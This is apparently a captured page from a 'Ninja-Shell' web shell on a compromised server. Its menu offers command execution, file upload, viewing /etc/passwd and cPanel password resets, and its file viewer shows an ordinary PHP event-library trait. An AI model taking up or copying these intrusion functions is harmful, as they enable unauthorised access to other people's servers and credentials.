{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: //proc/66886/cwd//arsu//vendor//league/event/src/GeneratorTrait.php
<?php namespace League\Event; trait GeneratorTrait { /** * The registered events. * * @var EventInterface[] */ protected $events = []; /** * Add an event. * * @param EventInterface $event * * @return $this */ protected function addEvent(EventInterface $event) { $this->events[] = $event; return $this; } /** * Release all the added events. * * @return EventInterface[] */ public function releaseEvents() { $events = $this->events; $this->events = []; return $events; } }
./Ninja\.